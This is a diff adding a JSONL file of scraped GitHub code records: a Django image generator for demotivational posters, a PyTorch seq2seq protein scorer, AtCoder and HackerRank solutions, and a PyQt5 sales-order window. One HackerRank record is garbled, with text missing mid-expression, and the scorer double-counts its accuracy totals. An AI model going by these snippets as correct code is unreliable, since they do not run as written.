diff --git "a/4710.jsonl" "b/4710.jsonl"
new file mode 100644
--- /dev/null
+++ "b/4710.jsonl"
@@ -0,0 +1,1436 @@
+{"seq_id":"38872048138","text":"from api.models import Post, Comment\nfrom PIL import Image, ImageDraw, ImageFont\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom io import BytesIO\nfrom django.core.files.uploadedfile import InMemoryUploadedFile\n\n\nclass ImageSerivce():\n    def __init__(self):\n        self.font_path = f'{settings.MEDIA_ROOT}/fonts/NewBaskervilleITCbyBT-Roman.otf'\n        self.default_width_multiplier = 1.1  # generated image width\n        self.default_height_multiplier = 1.25  # generated image height\n        self.border_multiplier = 1.02  # how much bigger the border will be than the image\n        self.primary_font_scale = 0.08  # font scale in relation to image height\n        self.bottom_font_scale = 0.04  # bottom text font scale in relation to image height\n\n    def generate_post_image(self, post: Post):\n        image = self._generate_image(post.image_file, post.primary_text,\n                                     post.bottom_text)\n        return self._convert_to_django_img(image)\n\n    def generate_comment_image(self, comment: Comment):\n        if comment.parent is None:\n            image_file = f\"{settings.MEDIA_ROOT}/posts/{comment.post.id}/generated.png\"\n        else:\n            image_file = f\"{settings.MEDIA_ROOT}/posts/{comment.post.id}/comment_{comment.parent.id}.png\"\n        image = self._generate_image(image_file, comment.primary_text,\n                                     comment.bottom_text)\n        return self._convert_to_django_img(image)\n\n    def _convert_to_django_img(self, image):\n        buffer = BytesIO()\n        image.save(fp=buffer, format='PNG')\n        pillow_image = ContentFile(buffer.getvalue())\n        return InMemoryUploadedFile(\n            pillow_image,  # file\n            None,  # field_name\n            'image.png',  # file name\n            'image/jpeg',  # content_type\n            pillow_image.tell,  # size\n            None)  # content_type_extra)\n\n    def _get_image_width_multiplier(self, bottom_text: int,\n                                    original_width: int):\n        \"\"\"\n        Get image width multiplier so that bottom text would fit\n        \"\"\"\n        return max(\n            len(bottom_text) / (original_width / 10),\n            self.default_width_multiplier)\n\n    def _generate_image(self, previous_image: str, primary_text: str,\n                        bottom_text: str):\n        \"\"\"\n        Lord have mercy\n        \"\"\"\n        pil_image = Image.open(previous_image)\n        orig_size = pil_image.size\n\n        # create black base\n        new_width_multiplier = self._get_image_width_multiplier(\n            bottom_text, orig_size[0])\n        final_img_size = (int(new_width_multiplier * orig_size[0]),\n                          int(self.default_height_multiplier * orig_size[1]))\n        final_img = Image.new(\"RGB\", final_img_size)\n\n        # create white border\n        border_size = tuple(\n            [int(x * self.border_multiplier) for x in orig_size])\n        border_x = int((final_img_size[0] - border_size[0]) / 2)\n        y_coord = (int(self.default_width_multiplier * orig_size[0]) -\n                   border_size[0]) // 2  # border starting y coordinate\n        border_coords = [(border_x, y_coord),\n                         (border_x + border_size[0], y_coord + border_size[1])]\n        final_img_draw = ImageDraw.Draw(final_img)\n        final_img_draw.rectangle(border_coords, fill=\"#000\", outline=\"#fff\")\n\n        # insert original image\n        center_x = (final_img_size[0] - orig_size[0]) // 2\n        y_coord = (int(self.default_width_multiplier * orig_size[0]) -\n                   orig_size[0]) // 2  # original image starting y coordinate\n        final_img.paste(pil_image, (center_x, y_coord))\n\n        font_size = int(self.primary_font_scale * orig_size[1])\n        font = ImageFont.truetype(self.font_path, font_size)\n\n        # insert primary text\n        text_size = final_img_draw.textsize(primary_text.upper(), font=font)\n        final_img_draw.text(\n            ((final_img_size[0] - text_size[0]) / 2, border_size[1] + y_coord),\n            primary_text.upper(), (255, 255, 255),\n            font=font)\n\n        # insert bottom text\n        bottom_font_size = int(self.bottom_font_scale * orig_size[1])\n        bottom_font = ImageFont.truetype(self.font_path, bottom_font_size)\n        subtext_size = final_img_draw.textsize(bottom_text, font=bottom_font)\n        final_img_draw.text(\n            ((final_img_size[0] - subtext_size[0]) / 2,\n             border_size[1] + y_coord + text_size[1] + subtext_size[1]),\n            bottom_text, (255, 255, 255),\n            font=bottom_font)\n\n        return final_img\n","repo_name":"kristalacka/demotivational-thread-site","sub_path":"demotivation/api/services/image_service.py","file_name":"image_service.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16392277553","text":"import os\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom data import DatasetBlock, DatasetBlocksp\nfrom model import Transformer\nfrom trainer import Seq2SeqTrainer\nimport options\nfrom torch.utils.data import DataLoader, DistributedSampler, RandomSampler\nfrom torch import distributed\nfrom torch.utils.tensorboard import SummaryWriter\nimport matplotlib.pyplot as pl\nfrom tqdm import tqdm\nimport pandas as pd\n\n\ndef load_dataset(args):\n    if args.task == 'block':\n        print(\"Loading Test Dataset\", args.test_dataset)\n        test_dataset = DatasetBlock(args.test_dataset, seq_len=args.seq_len)\n    elif args.task == 'blocksp':\n        print(\"Loading Test Dataset\", args.test_dataset)\n        test_dataset = DatasetBlocksp(args.test_dataset, seq_len=args.seq_len)\n    else:\n        raise ValueError('unknown task name')\n\n    return test_dataset\n\n\nparser = options.get_training_parser()\nargs = options.parse_args_and_arch(parser)\n\nif args.multi_node:\n    distributed.init_process_group(\n        backend=args.backend,\n        init_method='env://'\n        # world_size=args.world_size,\n        # rank=args.rank,\n    )\n\n# GPU mode: 0 - 1 gpu, 1 -- 1 Node, 2 -- multi Nodes\ngpu_mode = 1\ncuda_device_id = 0\nif distributed.is_available():\n    if distributed.is_initialized():\n        gpu_mode = 2\n        cuda_device_id = args.local_rank\nelif not torch.cuda.is_available():\n    gpu_mode = 0\n\n# Setup cuda device\nif gpu_mode == 2:\n    torch.cuda.set_device(cuda_device_id)\n    device = torch.device(f\"cuda:{cuda_device_id}\")\nelif (gpu_mode == 1) & torch.cuda.is_available():\n    device = torch.device(\"cuda:0\")\nelse:\n    device = torch.device(\"cpu\")\n\ntest_dataset = load_dataset(args)\n\ntest_data_loader = DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.num_workers)\n\n# build model\nprint(\"Building BERT model\")\n# Initialize the BERT Language Model, with BERT model\nmodel = Transformer(len(test_dataset.vocab),\n                    hidden=args.hidden, n_layers=args.layers, attn_heads=args.attn_heads)\n\nif args.restart:\n    print(\"reload pretrained BERT model\")\n    model.load_state_dict(torch.load(args.restart_file, map_location=torch.device('cpu')))\n\nmodel.to(device)\n\n# Distributed GPU training if CUDA can detect more than 1 GPU\nif gpu_mode == 2:\n    print(f\"Using GPU {cuda_device_id}\")\n    model = nn.parallel.DistributedDataParallel(model,\n                                                device_ids=[cuda_device_id],\n                                                output_device=cuda_device_id,\n                                                find_unused_parameters=True)\nelif (gpu_mode == 1) and (torch.cuda.device_count() > 1):\n    print(\"Using %d GPUS for BERT\" % torch.cuda.device_count())\n    model = nn.DataParallel(model)\n\nmodel.eval()\n\ntorch.set_grad_enabled(False)\n\n\ntotal_correct = 0\ntotal_element = 0\nlen_data_loader = len(test_data_loader)\n\nloss_fn = nn.NLLLoss(ignore_index=0, reduction='none')\n\nscore_all = []\nloss_all = []\n\ndf = pd.read_csv('data/blosum62_array.csv', dtype=np.float32)\n# vocab = 23, pad_index = 0, 2 other indexes\nsubmat = df.values\nsubmat = np.pad(submat, ((1, 2), (1, 2)), 'constant', constant_values=0)\n\nfor i, data in tqdm(enumerate(test_data_loader)):\n    data = {key: value.to(device) for key, value in data.items()}\n\n    seq_output = model.forward(data[\"src\"], data[\"tgt_x\"])\n\n    # NLLLoss of predicting masked token word\n    # (N, T, E) --> (N, E, T)\n\n    loss = loss_fn(seq_output.transpose(1, 2), data[\"tgt_y\"])\n\n    # masked token prediction accuracy\n    idx = (data[\"tgt_y\"] > 0)\n    # print(mask_lm_output.transpose(1, 2).argmax(dim=1)[idx])\n    # print(mask_lm_output.transpose(1, 2).argmax(dim=1)[idx].eq(data[\"bert_label\"][idx]))\n    correct = seq_output.transpose(1, 2).argmax(dim=1)[idx].eq(data[\"tgt_y\"][idx]).sum().item()\n    batch_n_element = data[\"tgt_y\"][idx].nelement()\n    total_correct += correct\n    total_element += batch_n_element\n\n    print(f'Accuracy/test: {100.0 * correct / batch_n_element}')\n\n    total_correct += correct\n    total_element += batch_n_element\n\n    seq_output = seq_output.detach().cpu().transpose(1, 2).argmax(dim=1).numpy()\n    seq_target = data[\"tgt_y\"].cpu().numpy()\n    # score = np.zeros_like(seq_target)\n    # for j in range(seq_target.shape[0]):\n    #     for k in range(seq_target.shape[1]):\n    #         score[j, k] = submat[seq_output[j, k], seq_target[j, k]]\n    score = submat[seq_target, seq_output].sum(axis=1)\n    # print(score)\n    # print(loss)\n\n    score_all.extend(list(score))\n    loss_all.extend(loss.detach().cpu().numpy().sum(axis=1))\n\n\nprint(f\"total_acc= {total_correct * 100.0 / total_element}\")\n\ndf2 = pd.DataFrame({'score': score_all, 'loss': loss_all})\ndf2.to_csv('data/seq_split_interdm_pred.csv', index=False)\n\n\n\n\n\n\n","repo_name":"lahplover/unippi","sub_path":"seq2seq_scorer.py","file_name":"seq2seq_scorer.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"19688845694","text":"# ABC-249 B - Counterclockwise Rotation\r\n# https://atcoder.jp/contests/abc259/tasks/abc259_b\r\n#\r\nimport math\r\n\r\n\r\ndef getIntMap():\r\n    return map(int, input().split())\r\n\r\n\r\ndef main():\r\n    a, b, d = getIntMap()\r\n\r\n    r = math.radians(d)\r\n\r\n    x = a * math.cos(r) - b * math.sin(r)\r\n    y = a * math.sin(r) + b * math.cos(r)\r\n\r\n    print(x, y)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","repo_name":"hyperdb/AtCoderPy","sub_path":"ABC/201-300/251-260/ABC-259-B.py","file_name":"ABC-259-B.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23201700554","text":"if __name__ == '__main__':\n    n = int(input())\n    arr = list( map(int, input().split()))\n    arr.sort(reverse=True)\n    for i in arr:\n        if(i m2:\n            m2 = arr[i]\n    print m2\nfrom collections import Counter\nif __name__ == '__main__':\n    n = int(raw_input())\n    arr = Counter(map(int, raw_input().split())).keys()\n    arr.sort()\n    print arr[-2]\nfrom collections import Counter\nif __name__ == '__main__':\n    n = int(raw_input())\n    arr = list(set(map(int, raw_input().split())))\n    arr.sort()\n    print arr[-2]\n\"\"\"\n","repo_name":"laziestcoder/Python_HR_Codes","sub_path":"2 Basic Data Types/Find the Runner-Up Score!.py","file_name":"Find the Runner-Up Score!.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"9557902192","text":"import datetime\nimport sys\n\nfrom PyQt5.QtCore import QTimer, Qt, QThread, pyqtSlot\nfrom PyQt5.QtGui import QPixmap\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox, QSplashScreen, QTreeWidgetItem\n\nfrom configuration import config, configfn\nfrom dialogs.csv_import_dialog import CsvFileImportDialog\nfrom dialogs.http_customers_dialog import GetCustomersHttpDialog\nfrom dialogs.http_products_dialog import GetProductsHttpDialog\nfrom dialogs.create_report_dialog import ReportDialogCreate\nfrom dialogs.settings_dialog import SettingsDialog\nfrom dialogs.visit_dialog import VisitDialog\nfrom models.contact import Contact\nfrom models.customer import Customer\nfrom models.orderline import OrderLine\nfrom models.employee import Employee\nfrom models.product import Product\nfrom models.report import Report\nfrom models.settings import Settings\nfrom models.visit import Visit\nfrom resources.main_window_rc import Ui_mainWindow\nfrom resources import splash_rc\nfrom util import utils\nfrom util.rules import check_settings\n\n__appname__ = \"Eordre NG\"\n__module__ = \"main.py\"\n\n\nclass MainWindow(QMainWindow, Ui_mainWindow):\n    \"\"\"\n    Main Application Window\n    \"\"\"\n\n    def __init__(self, parent=None):\n        \"\"\"\n        Initialize MainWindow class\n        \"\"\"\n        super(MainWindow, self).__init__(parent)\n        self.setupUi(self)\n        QThread.currentThread().setObjectName(__appname__)\n        configfn.check_config_folder()  # Check appdata folder in users home\n\n        self.txtWorkdate.setText(datetime.date.today().isoformat())  # initialize workdate to current date\n        self._contacts = Contact()  # Initialize Contact object\n        self._customers = Customer()  # Initialize Customer object\n        self._orderlines = OrderLine()  # Initialize Detail object\n        self._employees = Employee()  # Initialize Employee object\n        self._products = Product()  # Initialize Product object\n        self._reports = Report()  # Initialize Report object\n        self._visits = Visit()  # Initialize Visit object\n        self._settings = Settings()  # Initialize Settings object\n\n        # # connect menu trigger signals\n        # self.actionAboutQt.triggered.connect(self.show_about_qt)\n        # self.actionAboutSoftware.triggered.connect(self.show_about_software)\n        # self.actionArchiveChanges.triggered.connect(self.archive_customer)\n        # self.actionContactsInfo.triggered.connect(self.show_contact_data_page)\n        # self.actionCreateCustomer.triggered.connect(self.create_customer)\n        # self.actionCreateVisit.triggered.connect(self.show_visit_dialog)\n        # self.actionImportCsvFiles.triggered.connect(self.show_csv_import_dialog)\n        # self.actionExit.triggered.connect(self.app_exit_slot)\n        # self.actionGetCatalogHttp.triggered.connect(self.show_http_products_dialog)\n        # self.actionGetCustomersHttp.triggered.connect(self.show_http_customers_dialog)\n        # self.actionMasterInfo.triggered.connect(self.show_master_data_page)\n        # self.actionReport.triggered.connect(self.show_create_report_dialog)\n        # self.actionReportList.triggered.connect(self.show_reports_dialog)\n        # self.actionSettings.triggered.connect(self.show_settings_dialog)\n        # self.actionVisitsInfo.triggered.connect(self.show_visit_data_page)\n        # self.actionZeroDatabase.triggered.connect(self.zero_database)\n        # # buttons on top\n        # self.btnAddCustomer.clicked.connect(self.create_customer)\n        # self.btnCreateReportDialog.clicked.connect(self.show_create_report_dialog)\n        # # buttons for paging data\n        # self.btnShowContacts.clicked.connect(self.show_contact_data_page)\n        # self.btnShowMasterdata.clicked.connect(self.show_master_data_page)\n        # self.btnShowVisits.clicked.connect(self.show_visit_data_page)\n        # # button on master data page\n        # self.btnArchiveMasterdata.clicked.connect(self.archive_customer)\n        # # buttons on contacts data page\n        # self.btnArchiveContacts.clicked.connect(self.archive_contacts_slot)\n        # self.btnAddContact.clicked.connect(self.add_contact_slot)\n        # # button visit data page\n        # self.btnVisitDialog.clicked.connect(self.show_visit_dialog)\n        # # connect list changes\n        # self.widgetCustomerList.currentItemChanged.connect(self.on_customer_changed)\n        # self.widgetVisitList.currentItemChanged.connect(self.on_visit_changed)\n        # # Hide the id column on visit list\n        # self.widgetVisitList.setColumnHidden(0, True)\n        # # Set header on visit details\n        # self.widgetVisitDetails.setColumnWidth(0, 30)\n        # self.widgetVisitDetails.setColumnWidth(1, 30)\n        # self.widgetVisitDetails.setColumnWidth(2, 100)\n        # self.widgetVisitDetails.setColumnWidth(3, 150)\n        # self.widgetVisitDetails.setColumnWidth(4, 60)\n        # self.widgetVisitDetails.setColumnWidth(5, 40)\n        # load report for workdate if exist\n        self._reports.load_report(self.txtWorkdate.text())\n        # display customerlist\n        self.populate_customer_list()\n        # set latest customer active\n        if self._customers.lookup_by_id(self._settings.setting[\"cust_idx\"]):\n            try:\n                phone = self._customers.customer[\"phone1\"]\n                self.widgetCustomerList.setCurrentIndex(\n                    self.widgetCustomerList.indexFromItem(\n                        self.widgetCustomerList.findItems(phone, Qt.MatchExactly, column=0)[0]))\n            except KeyError:\n                pass\n        # set last info page used\n        if self._settings.setting[\"page_idx\"]:\n            self.widgetCustomerInfo.setCurrentIndex(self._settings.setting[\"page_idx\"])\n\n    def closeEvent(self, event):\n        \"\"\"\n        Slot for close event signal\n        Args:\n            event:\n\n        intended use is warning about unsaved data\n        \"\"\"\n        # TODO handle close event\n        self.app_exit_slot()\n        pass\n\n    @pyqtSlot(name=\"app_exit_slot\")\n    def app_exit_slot(self):\n        \"\"\"\n        Slot for exit triggered signal\n        \"\"\"\n        # customer id\n        try:\n            self._settings.setting[\"cust_idx\"] = self._customers.customer[\"customer_id\"]\n        except KeyError:\n            self._settings.setting[\"cust_idx\"] = 0\n        # customer info page\n        if not self._settings.setting[\"page_idx\"]:\n            self._settings.setting[\"page_idx\"] = self.widgetCustomerInfo.currentIndex()\n        # save setttings\n        self._settings.update()\n        app.quit()\n\n    def display_sync_status(self):\n        \"\"\"\n        Update status fields\n        \"\"\"\n        self.txtCustLocal.setText(self._settings.setting[\"lsc\"])\n        self.txtCustServer.setText(self._settings.setting[\"sac\"])\n        self.txtProdLocal.setText(self._settings.setting[\"lsp\"])\n        self.txtProdServer.setText(self._settings.setting[\"sap\"])\n\n    def populate_contact_list(self):\n        \"\"\"\n        Populate the contactlist based on currently selected customer\n        \"\"\"\n        # load contacts\n        self.widgetContactList.clear()\n        items = []\n        try:\n            self._contacts.list_ = self._customers.customer[\"customer_id\"]\n            for c in self._contacts.list_:\n                item = QTreeWidgetItem([c[\"name\"],\n                                        c[\"department\"],\n                                        c[\"phone\"],\n                                        c[\"email\"]])\n                items.append(item)\n        except IndexError:\n            pass\n        except KeyError:\n            pass\n\n        self.widgetContactList.addTopLevelItems(items)\n\n    def populate_customer_list(self):\n        \"\"\"\n        Populate customer list\n        \"\"\"\n        self.widgetCustomerList.clear()  # shake the tree for leaves\n        self.widgetCustomerList.setColumnCount(4)  # set columns\n        self.widgetCustomerList.setHeaderLabels([\"Telefon\", \"Firma\", \"Post\", \"Bynavn\"])\n        items = []  # temporary list\n        try:\n            for c in self._customers.list_:\n                item = QTreeWidgetItem([c[\"phone1\"], c[\"company\"], c[\"zipcode\"], c[\"city\"]])\n                items.append(item)\n        except (IndexError, KeyError):\n            pass\n        # assign Widgets to Tree\n        self.widgetCustomerList.addTopLevelItems(items)\n        self.widgetCustomerList.setSortingEnabled(True)  # enable sorting\n\n    def populate_visit_details_list(self):\n        \"\"\"\n        Populate the details list based on the line visit\n        \"\"\"\n        self.widgetVisitDetails.clear()\n        self.txtPoNumber.setText(\"\")\n        self.txtSas.setText(\"\")\n        self.txtSale.setText(\"\")\n        self.txtTotal.setText(\"\")\n        self.lblApproved.setText(\"\")\n        self.lblSent.setText(\"\")\n        self.txtVisitInfoText.setText(\"\")\n\n        items = []\n        try:\n            self._orderlines.list_ = self._visits.visit[\"visit_id\"]\n\n            self.txtPoNumber.setText(self._visits.visit[\"po_number\"])\n            self.txtSas.setText(str(self._visits.visit[\"po_sas\"]))\n            self.txtSale.setText(str(self._visits.visit[\"po_sale\"]))\n            self.txtTotal.setText(str(self._visits.visit[\"po_total\"]))\n            self.lblSent.setText(utils.bool2dk(utils.int2bool(self._visits.visit[\"po_sent\"])))\n            self.lblApproved.setText(utils.bool2dk(utils.int2bool(self._visits.visit[\"po_approved\"])))\n            self.txtVisitInfoText.setText(self._visits.visit[\"po_note\"])\n\n            for detail in self._orderlines.list_:\n                item = QTreeWidgetItem([detail[\"linetype\"],\n                                        str(detail[\"pcs\"]),\n                                        detail[\"sku\"],\n                                        detail[\"text\"],\n                                        str(detail[\"price\"]),\n                                        str(detail[\"discount\"]),\n                                        detail[\"extra\"]])\n                items.append(item)\n        except KeyError:\n            pass\n        except IndexError:\n            pass\n        self.widgetVisitDetails.addTopLevelItems(items)\n\n    def populate_visit_list(self):\n        \"\"\"\n        Populate the visitlist based on the active customer\n        \"\"\"\n        # populate visit list table\n        self.widgetVisitList.clear()\n        # self.widgetVisitList.setColumnCount(5)\n        self.widgetVisitList.setHeaderLabels([\"Id\", \"Dato\", \"Navn\", \"Demo\", \"Salg\"])\n        self.widgetVisitList.setColumnWidth(0, 0)\n        items = []\n        try:\n            self._visits.list_customer = self._customers.customer[\"customer_id\"]\n            for visit in self._visits.list_customer:\n                item = QTreeWidgetItem([str(visit[\"visit_id\"]),\n                                        visit[\"visit_date\"],\n                                        visit[\"po_buyer\"],\n                                        visit[\"prod_demo\"],\n                                        visit[\"prod_sale\"]])\n                items.append(item)\n        except IndexError:\n            pass\n        except KeyError:\n            pass\n        self.widgetVisitList.addTopLevelItems(items)\n\n    def resizeEvent(self, event):\n        \"\"\"\n        Slot for the resize event signal\n        Args:\n            event:\n        intended use is resize content to window\n        :param event:\n        \"\"\"\n        # TODO handle resize event\n        pass\n\n    def run(self):\n        \"\"\"\n        Setup database and basic configuration\n        \"\"\"\n        # basic settings must be done\n        is_set = check_settings(self._settings.setting)\n        if is_set:\n            try:\n                _ = self._employees.employee[\"fullname\"]\n            except KeyError:\n                msgbox = QMessageBox()\n                msgbox.about(self,\n                             __appname__,\n                             \"Der er en fejl i dine indstillinger.\\nKontroller dem venligst.\\nTak.\")\n        else:\n            msgbox = QMessageBox()\n            msgbox.about(self,\n                         __appname__,\n                         \"App'en skal bruge nogle oplysninger.\\nRing kontoret hvis du er i tvivl.\\nTak.\")\n\n        self.show_settings_dialog()\n\n        # if requested check server data\n        if utils.int2bool(self._settings.setting[\"sc\"]):\n            # update sync status\n            status = utils.refresh_sync_status(self._settings)\n            self._settings.setting[\"sac\"] = status[0][1].split()[0]\n            self._settings.setting[\"sap\"] = status[1][1].split()[0]\n            self._settings.update()\n\n        # display known sync data\n        self.display_sync_status()\n\n    @pyqtSlot(name=\"add_contact_slot\")\n    def add_contact_slot(self):\n        \"\"\"\n        Save changes made to contacts\n        \"\"\"\n        # TODO add new contact\n        msgbox = QMessageBox()\n        msgbox.information(self,\n                           __appname__,\n                           \"# TODO add new contact\",\n                           QMessageBox.Ok)\n\n    @pyqtSlot(name=\"archive_contacts_slot\")\n    def archive_contacts_slot(self):\n        \"\"\"\n        Save changes made to contacts\n        \"\"\"\n        # TODO save changes made to contacts\n        msgbox = QMessageBox()\n        msgbox.information(self,\n                           __appname__,\n                           \"# TODO save changes made to contacts\",\n                           QMessageBox.Ok)\n\n    @pyqtSlot(name=\"archive_customer\")\n    def archive_customer(self):\n        \"\"\"\n        Slot for updateCustomer triggered signal\n        \"\"\"\n        if not self._customers.customer:\n            # msgbox triggered if no current is selected\n            msgbox = QMessageBox()\n            msgbox.information(self,\n                               __appname__,\n                               \"Det kan jeg ikke på nuværende tidspunkt!\",\n                               QMessageBox.Ok)\n            return False\n        # assign input field values to current object\n        self._customers.customer[\"company\"] = self.txtCompany.text()\n        self._customers.customer[\"address1\"] = self.txtAddress1.text()\n        self._customers.customer[\"address2\"] = self.txtAddress2.text()\n        self._customers.customer[\"zipcode\"] = self.txtZipCode.text()\n        self._customers.customer[\"city\"] = self.txtCityName.text()\n        self._customers.customer[\"phone1\"] = self.txtPhone1.text()\n        self._customers.customer[\"phone2\"] = self.txtPhone2.text()\n        self._customers.customer[\"email\"] = self.txtEmail.text()\n        self._customers.customer[\"factor\"] = self.txtFactor.text()\n        self._customers.customer[\"infotext\"] = self.txtCustomerInfoText.toPlainText()\n        self._customers.customer[\"modified\"] = 1\n        self._customers.update()\n\n    @pyqtSlot(name=\"create_customer\")\n    def create_customer(self):\n        \"\"\"\n        Slot for createCustomer triggered signal\n        \"\"\"\n        if not self.txtNewCompany.text() or not self.txtNewPhone1.text():\n            msgbox = QMessageBox()\n            msgbox.information(self,\n                               __appname__,\n                               \"Snap - Jeg mangler:\\n Firma navn \\n Telefon nummer\",\n                               QMessageBox.Ok)\n        else:\n            msgbox = QMessageBox()\n            msgbox.information(self,\n                               __appname__,\n                               \"Gem kunde til database\\n\\n\" +\n                               self.txtNewCompany.text() + \"\\n\" +\n                               self.txtNewPhone1.text(),\n                               QMessageBox.Ok)\n\n    @pyqtSlot(QTreeWidgetItem, QTreeWidgetItem, name=\"on_customer_changed\")\n    def on_customer_changed(self, current, previous):\n        \"\"\"\n        Slot for treewidget current item changed signal\n        Used to respond to changes in the currently selected current\n        and update the related current info pages\n\n        Args:\n            current: currently selected item\n            previous: previous selected item\n        \"\"\"\n        try:\n            phone = current.text(0)\n            company = current.text(1)\n            # move current customer\n            # load customer\n            self._customers.lookup(phone, company)\n            # fields to line edits\n            self.txtAccount.setText(self._customers.customer[\"account\"])\n            self.txtCompany.setText(self._customers.customer[\"company\"])\n            self.txtAddress1.setText(self._customers.customer[\"address1\"])\n            self.txtAddress2.setText(self._customers.customer[\"address2\"])\n            self.txtZipCode.setText(self._customers.customer[\"zipcode\"])\n            self.txtCityName.setText(self._customers.customer[\"city\"])\n            self.txtPhone1.setText(self._customers.customer[\"phone1\"])\n            self.txtPhone2.setText(self._customers.customer[\"phone2\"])\n            self.txtEmail.setText(self._customers.customer[\"email\"])\n            self.txtFactor.setText(str(self._customers.customer[\"factor\"]))\n            self.txtCustomerInfoText.setText(self._customers.customer[\"infotext\"])\n        except AttributeError:\n            pass\n        except KeyError:\n            pass\n        # load customer infos\n        self.populate_contact_list()\n        self.populate_visit_list()\n        self.populate_visit_details_list()\n\n    @pyqtSlot(name=\"on_csv_import_done\")\n    def on_csv_import_done(self):\n        \"\"\"\n        Slog for csv import done signal\n        \"\"\"\n        self.populate_customer_list()\n\n    @pyqtSlot(name=\"on_customers_done\")\n    def on_customers_done(self):\n        \"\"\"\n        Slot for getCustomers finished signal\n        \"\"\"\n        self.populate_customer_list()\n        lsc = datetime.date.today().isoformat()\n        self.txtCustLocal.setText(lsc)\n        self._settings.setting[\"lsc\"] = lsc\n        self._settings.update()\n\n    @pyqtSlot(name=\"on_products_done\")\n    def on_products_done(self):\n        \"\"\"\n        Slot for getProducts finished signal\n        \"\"\"\n        self._products.all()\n        lsp = datetime.date.today().isoformat()\n        self.txtProdLocal.setText(lsp)\n        self._settings.setting[\"lsp\"] = lsp\n        self._settings.update()\n\n    @pyqtSlot(name=\"on_settings_changed\")\n    def on_settings_changed(self):\n        \"\"\"\n        load employee data\n        :return:\n        \"\"\"\n        self._settings.load()\n        self._employees.load(self._settings.setting[\"usermail\"])\n\n    @pyqtSlot(QTreeWidgetItem, QTreeWidgetItem, name=\"on_visit_changed\")\n    def on_visit_changed(self, current, previous):\n        \"\"\"\n        Response to current visit changed\n        Args:\n            current:\n            previous:\n        \"\"\"\n        try:\n            self._visits.visit = current.text(0)\n        except AttributeError:\n            pass\n        except KeyError:\n            pass\n        self.populate_visit_details_list()\n\n    @pyqtSlot(name=\"data_export\")\n    def data_export(self):\n        \"\"\"\n        Slot for dataExport triggered signal\n        \"\"\"\n        # TODO: Opret CSV data backup\n        msgbox = QMessageBox()\n        msgbox.information(self,\n                           __appname__,\n                           \"TODO: Opret CSV data backup\",\n                           QMessageBox.Ok)\n\n    @pyqtSlot(name=\"show_about_qt\")\n    def show_about_qt(self):\n        \"\"\"\n        Slot for aboutQt triggered signal\n        \"\"\"\n        msgbox = QMessageBox()\n        msgbox.aboutQt(self, __appname__)\n\n    @pyqtSlot(name=\"show_about_software\")\n    def show_about_software(self):\n        \"\"\"\n        Slot for aboutSoftware triggered signal\n        \"\"\"\n        msgbox = QMessageBox()\n        msgbox.about(self, __appname__,\n                     \"Bygget med Python 3.6 og Qt5\\n\\nFrede Hundewadt (c) 2017\\n\\n\"\n                     \"https://www.gnu.org/licenses/agpl.html\")\n\n    @pyqtSlot(name=\"show_contact_data_page\")\n    def show_contact_data_page(self):\n        \"\"\"\n        Slot for contactData triggered signal\n        \"\"\"\n        self.widgetCustomerInfo.setCurrentIndex(1)\n\n    @pyqtSlot(name=\"show_create_report_dialog\")\n    def show_create_report_dialog(self):\n        \"\"\"\n        Slot for Report triggered signal\n        \"\"\"\n        try:\n            # check the report date\n            # no report triggers KeyError which in turn launches the CreateReportDialog\n            repdate = self._reports.report[\"rep_date\"]\n            if not repdate == self.txtWorkdate.text():\n                # if active report is not the same replace it with workdate\n                self._reports.load_report(self.txtWorkdate.text())\n                # trigger a KeyError if no report is current which launches the CreateReportDialog\n                repdate = self._reports.report[\"rep_date\"]\n            # check if the report is sent\n            if self._reports.report[\"sent\"] == 1:\n                # we do not allow visits to be created on a report which is closed\n                self.buttonCreateVisit.setEnabled(False)\n            else:\n                self.buttonCreateVisit.setEnabled(True)\n            infotext = \"Rapport aktiv for: {}\".format(repdate)\n            msgbox = QMessageBox()\n            msgbox.information(self, __appname__, infotext, QMessageBox.Ok)\n            return True\n\n        except KeyError:\n            # Show report dialog\n            create_report_dialog = ReportDialogCreate(self.txtWorkdate.text())\n            if create_report_dialog.exec_():\n                # user chosed to create a report\n                self.txtWorkdate.setText(create_report_dialog.workdate)\n                # try load a report for that date\n                self._reports.load_report(self.txtWorkdate.text())\n                try:\n                    # did the user choose an existing report\n                    _ = self._reports.report[\"rep_date\"]\n                    infotext = \"Eksisterende rapport hentet: {}\".format(self.txtWorkdate.text())\n                except KeyError:\n                    # create the report\n                    self._reports.create(self._employees.employee, self.txtWorkdate.text())\n                    infotext = \"Rapport oprettet for: {}\".format(self.txtWorkdate.text())\n                msgbox = QMessageBox()\n                msgbox.information(self, __appname__, infotext, QMessageBox.Ok)\n                return True\n            else:\n                msgbox = QMessageBox()\n                msgbox.information(self,\n                                   __appname__,\n                                   \"Den aktive rapport er IKKE ændret!\",\n                                   QMessageBox.Ok)\n                return False\n\n    @pyqtSlot(name=\"shoq_csv_import_dialog\")\n    def show_csv_import_dialog(self):\n        \"\"\"\n        Slot for fileImport triggered signal\n        \"\"\"\n        if self._customers.list_:\n            msgbox = QMessageBox()\n            msgbox.warning(self,\n                           __appname__,\n                           \"Ved import slettes alle eksisterende data!\\n\\n\"\n                           \"Det er alt eller intet af hensyn til datas sammenhæng.\\n\"\n                           \"Du SKAL importere ALLE tabeller fra listen!\\n\\n\"\n                           \"Gør du ikke det giver det uløselige problemer!\",\n                           QMessageBox.Ok)\n        # app, contact, customer, detail, employee, report, visit, tables\n        import_dialog = CsvFileImportDialog(app, contacts=self._contacts, customers=self._customers,\n                                            employees=self._employees, orderlines=self._orderlines,\n                                            reports=self._reports, tables=config.CSV_TABLES, visits=self._visits)\n        import_dialog.sig_done.connect(self.on_csv_import_done)\n        import_dialog.exec_()\n\n    